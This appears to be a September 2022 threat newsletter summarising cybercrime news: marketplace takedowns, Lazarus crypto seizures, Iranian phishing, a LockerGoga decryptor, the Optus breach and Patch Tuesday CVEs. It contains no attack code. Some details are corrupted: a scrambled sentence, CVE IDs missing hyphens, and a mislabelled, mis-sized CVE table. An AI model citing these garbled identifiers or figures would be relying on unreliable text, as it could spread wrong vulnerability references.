fbpx

InForce Cyber

Threat Report September 2022 

  1. Authorities Shut Down WT1SHOP Site

An international law enforcement operation has resulted in the dismantling of WT1SHOP, an online criminal marketplace that specializes in the sales of stolen login credentials and other personal information. The seizure was orchestrated by Portuguese authorities, with the U.S. officials taking control of four domains used by the website: „wt1shop[.]net,“ „wt1store[.]cc,“ „wt1store[.]com,“ and „wt1store[.]net.“The website peddled over 5.85 million records of personally identifying information (PII), including approximately 25,000 scanned driver’s licenses/passports, 1.7 million login credentials (DoJ) said. for various online shops, 108,000 bank accounts, 21,800 credit cards, the U.S. Justice Department

2.  U.S. Seizes Cryptocurrency stolen by Lazarus Group

More than $30 million worth of cryptocurrency plundered by the North Korea-linked Lazarus Group from online video game Axie Infinity has been recovered, marking the first time digital assets stolen by the threat actor have been seized.

„The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized) and demonstrate that it is becoming more difficult for bad actors to cash out their ill-gotten crypto gains successfully,“ Erin Plante, senior director of investigations at Chainalysis, said.

Iranian Hackers Target High-Value Targets in Nuclear Security and Genomic Research

Hackers tied to the Iranian government have been targeting individuals specializing in Middle Eastern affairs, nuclear security, and genome research as part of a new social engineering campaign designed to hunt for sensitive information.

Enterprise security firm Proofpoint attributed the targeted attacks to a threat actor named TA453, which broadly overlaps with cyber activities monitored under the monikers APT42, Charming Kitten, and Phosphorus.

It all starts with a phishing email impersonating legitimate individuals at Western foreign policy research organizations that are ultimately designed to gather intelligence on behalf of Iran’s Islamic Revolutionary Guard Corps (IRGC). The sock puppet accounts include people from Pew Research Center, the Foreign Policy Research Institute (FRPI), the U.K.’s Chatham House, and the scientific journal Nature. The technique is said to have been deployed in mid-June 2022. However, what differentiates this from other phishing attacks is the use of a tactic Proofpoint calls Multi-Persona Impersonation (MPI), wherein the threat actor employs not one but several actor-controlled personas in the same email conversation to bolster the chances of success.

  1. Free Decryptor for LockerGoga Ransomware

A decryptor for the LockerGoga ransomware has been made available by Romanian cybersecurity firm Bitdefender in collaboration with Europol, the No More Ransom project, and Zurich law enforcement authorities.

Identified in January 2019, LockerGoga drew headlines for its attacks against the Norwegian aluminum giant Norsk Hydro. It is said to have infected more than 1,800 victims in 71 countries, causing an estimated $104 million in damages. The ransomware operation received a significant blow in October 2021 when 12 people in connection with the group, alongside MegaCortex and Dharma, were apprehended as part of an international law enforcement effort. The Zurich Cantonal Police further said it spent the past months examining the data storage devices confiscated from the individual during the 2021 arrests and identified numerous private keys that were used to lock the data. A decryption utility for MegaCortex is also expected to be published in the coming months. Victimized parties are also recommended to file a criminal complaint in their respective home countries.

„These keys enable the aggrieved companies and institutions to recover the data that was previously encrypted with the malware LockerGoga or MegaCortex,“ the agency said.

  1. Crypto Trading Firm Wintermute Loses $160 Million in

Hacking Incident

In what is the latest crypto heist to target the decentralized finance (DeFi) space, hackers have stolen digital assets worth around $160 million from crypto trading firm Wintermute.

The hack involved a series of unauthorized transactions that transferred USD Coin, Binance USD, Tether USD, Wrapped ETH, and 66 other cryptocurrencies to the attacker’s wallet.

The company said the security incident had not impacted its centralized finance (CeFi) and overthe-counter (OTC) operations. It did not disclose when the hack took place.

  1. Ukraine Arrests Cybercrime Group

Ukrainian law enforcement authorities on Friday disclosed that it had „neutralized“ a hacking group operating from the city of Lviv that it said acted on behalf of Russian interests. The group specialized in the sales of 30 million accounts belonging to citizens from Ukraine and the European Union on the dark web and netted a profit of $372,000 (14 million UAH) through electronic payment systems like YooMoney, Qiwi, and WebMoney that are outlawed in the country.“Their ‘wholesale clients’ were pro-kremlin propagandists,“ the Security Service of Ukraine (SSU) saidin a press release. „It was them who used the received identification data of Ukrainian and foreign citizens to spread fake ‘news’ from the front and sow panic.“

  1. Hacker Behind Optus Breach Releases 10,200 customer records

The Australian Federal Police (AFP) on Monday disclosed it is working to gather „crucial evidence“ and that it is collaborating with overseas law enforcement authorities following the hack of telecom provider Optus. Operation Hurricane has been launched to identify the criminals behind the alleged breach and to help shield Australians from identity fraud,“ the AFP said in a statement. The development comes after Optus, Australia’s second-largest wireless carrier, disclosed on

September 22, 2022, that it was a victim of a cyberattack. It claimed it „immediately shut down the attack“ as soon as it came to light. The threat actor behind the breach also briefly released a sample of 10,200 records from the breach – putting those users at heightened risk of fraud – in addition to asking for $1 million as part of an extortion demand. The dataset has since been taken down, with the attacker claiming to have deleted the only copy of the stolen data.

  1. Critical WhatsApp Bugs

WhatsApp has released security updates to address two flaws in its messaging app for Android and iOS that could lead to remote code execution on vulnerable devices. One of them concerns CVE202236934 (CVSS score: 9.8), a critical integer overflow vulnerability in WhatsApp that results in the execution of arbitrary code simply by establishing a video call. The issue impacts WhatsApp and WhatsApp Business for Android and iOS prior to versions 2.22.16.12.

  1. Hackers Using PowerPoint Mouseover Trick to Infect

Systems

The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that uses mouse movement in decoy Microsoft PowerPoint documents to deploy malware. The technique „is designed to be triggered when the user starts the presentation mode and moves the mouse,“ cybersecurity firm Cluster25 said in a technical report. „The code execution runs a PowerShell script that downloads and executes a dropper from OneDrive.“

  1. 85 Apps with 13 Million Downloads Involved in Ad Fraud Scheme

As many as 75 apps on Google Play and 10 on Apple App Store have been discovered engaging in ad fraud as part of an ongoing campaign that commenced in 2019. The latest iteration, dubbed Scylla by Online fraud-prevention firm HUMAN Security, follows similar attack waves in August 2019 and late 2020 that goes by the codename Poseidon and Charybdis, respectively. Prior to their removal from the app storefronts, the apps had been collectively installed more than 13 million times.

Microsoft has released 63 security patches for its September 2022 Patch Tuesday rollout. Five vulnerabilities are rated Critical, 57 are rated Important, one is Moderate, and one is rated Low in severity. This month’s release includes a bug discovered by CrowdStrike in conjunction with other security researchers: CVE-2022-37969 is publicly known, and there is evidence it has been exploited in the wild.

Here is the top 10 list of CVEs released by Microsoft for August 2022:

 

Rank

CVSS Score

CVE

Description

Important

8.8

CVE-202238009

Microsoft SharePoint Server Remote Code Execution Vulnerability

Important

8.8

CVE-202238008

Microsoft SharePoint Server Remote Code Execution Vulnerability

Important

8.8

CVE-202237961

Microsoft SharePoint Server Remote Code Execution Vulnerability

Important

8.1

CVE-202235823

Microsoft SharePoint Server Remote Code Execution Vulnerability

 

 

Critical

9.8

CVE-202234718

Windows TCP/IP Remote Code Execution

Vulnerability

Critical

9.8

CVE-202234721

Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability

Critical

9.8

CVE-202234722

Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution Vulnerability

Critical

8.8

CVE-202234700

Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

Critical

8.8

CVE-202235805

Microsoft Dynamics 365 (on-premises) Remote Code Execution Vulnerability

Important

8.1

CVE-202233647

Windows Kerberos Elevation of Privilege Vulnerability

Important

8.1

CVE-202233679

Windows Kerberos Elevation of Privilege Vulnerability

 

Figure 1. Breakdown of products affected by September 2022 Patch Tuesday

Figure 2.  Breakdown of September 2022 Patch Tuesday attack types

Figure 2. The escalation path of a ransomware attack across the kill chain

Figure 4. Graphic representation of Botnet attack